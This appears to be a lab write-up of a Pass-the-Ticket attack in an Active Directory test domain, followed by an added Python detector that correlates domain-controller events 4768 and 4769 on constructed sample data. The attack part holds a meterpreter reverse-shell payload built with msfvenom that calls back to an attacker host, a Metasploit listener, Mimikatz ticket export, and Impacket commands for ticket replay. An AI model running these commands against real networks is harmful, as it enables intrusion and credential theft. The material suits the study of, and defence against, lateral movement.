Network Diagram

[Network diagram image]

Laboratory Setup

The lab consists of an Active Directory environment configured with the following parameters.

Users

The following user accounts have been added to the domain structure:
[Screenshot: domain user list]

Exploitation phase

Since Pass-the-Hash is a lateral movement technique, we require an established shell with administrative/system privileges on one of the network endpoints.
I will establish an interactive meterpreter session. To achieve this, I generate a malicious executable with msfvenom that the user manuel will then run.

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=172.25.100.35 LPORT=4444 -f exe -o virus.exe

We initialize the Metasploit multi-handler payload listener:

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter_reverse_tcp
set LHOST 172.25.100.35
run


NOTE
Since we already hold valid credentials, executing a binary payload is not strictly necessary. We could pivot laterally using RDP or tools within the Impacket suite. However, because meterpreter natively includes the Mimikatz suite via the kiwi extension, I opted for this approach for convenience.

Note that this terminal session runs with Windows SYSTEM privileges, accurately replicating a scenario where an initial endpoint has been completely compromised, and the threat actor aims to pivot across the infrastructure.

Pass-the-Ticket (PtT)

This is a post-exploitation lateral movement technique in which an attacker takes valid Kerberos tickets (TGTs or TGSs) already cached in memory on a compromised system (readable when running as SYSTEM) and reuses them to impersonate the ticket owner across domain assets.

We extract the target Kerberos tickets directly out of memory:

kiwi_cmd sekurlsa::tickets /export

We save the exported base64 ticket into a file. The ticket can then be used from meterpreter, from a second Windows machine, or via Impacket.

kerberos_ticket_use <Path_to_ccache>

To use this ticket outside of Kiwi, we replicate the conversion pipeline:

cat manuel.base64 | base64 -d > manuel.kirbi
impacket-ticketConverter manuel.kirbi manuel.ccache
export KRB5CCNAME=$(pwd)/manuel.ccache

In this demonstration, we use the injected ticket to list the SMB shares of the target host:

impacket-smbclient -k -no-pass AROCHE.LOCAL/manuel@win-lgsoqdrpjqu.aroche.local

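The replay above leaves a recognisable trace on the domain controller: the service-ticket request (event 4769) for manuel arrives from 172.25.100.35, a client address that never obtained a TGT for that account (event 4768). The following check, added here as an example and not part of the original lab notes, correlates the two events by account and client address; the workstation address 172.25.100.50, the timestamps and the event records are constructed, the field names follow the Windows Security event schema.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of domain-controller Security-log events, reduced to the
# fields this check needs. 172.25.100.50 stands in for the workstation where
# manuel logged on interactively; 172.25.100.35 is the attacking host.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "manuel", "IpAddress": "::ffff:172.25.100.50",
     "TimeCreated": "2024-05-01T09:00:00"},
    {"EventID": 4769, "TargetUserName": "manuel@AROCHE.LOCAL", "ServiceName": "WIN-LGSOQDRPJQU$",
     "IpAddress": "::ffff:172.25.100.50", "TimeCreated": "2024-05-01T09:00:05"},
    # The exported TGT replayed via impacket-smbclient -k from the Linux box:
    # a service ticket is requested, but this client never asked for a TGT.
    {"EventID": 4769, "TargetUserName": "manuel@AROCHE.LOCAL", "ServiceName": "WIN-LGSOQDRPJQU$",
     "IpAddress": "::ffff:172.25.100.35", "TimeCreated": "2024-05-01T09:20:00"},
]


def user_key(name: str) -> str:
    """Normalise 'manuel@AROCHE.LOCAL' (4769) and 'manuel' (4768) to one key."""
    return name.split("@", 1)[0].lower()


def client_ip(addr: str) -> str:
    """Drop the IPv4-mapped prefix the DC writes for IPv4 clients."""
    return addr[7:] if addr.startswith("::ffff:") else addr


def find_pass_the_ticket(events, tgt_lifetime=timedelta(hours=10)):
    """Return the 4769 events for which no 4768 from the same (user, client IP)
    exists within one default TGT lifetime before them."""
    tgt_times = defaultdict(list)  # (user, ip) -> timestamps of TGT issuance
    suspicious = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        key = (user_key(ev["TargetUserName"]), client_ip(ev["IpAddress"]))
        ts = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == 4768:
            tgt_times[key].append(ts)
        elif ev["EventID"] == 4769:
            if not any(ts - tgt_lifetime <= t <= ts for t in tgt_times[key]):
                suspicious.append(ev)
    return suspicious


if __name__ == "__main__":
    for ev in find_pass_the_ticket(SAMPLE_EVENTS):
        print(f"{ev['TimeCreated']} {user_key(ev['TargetUserName'])} from "
              f"{client_ip(ev['IpAddress'])} requested {ev['ServiceName']} "
              "with no TGT issued to that client")
```

Run it against the 4768/4769 events of every domain controller at once, since a legitimate client may obtain its TGT from one DC and its service tickets from another; NAT or VPN concentrators that rewrite client addresses also need to be excluded.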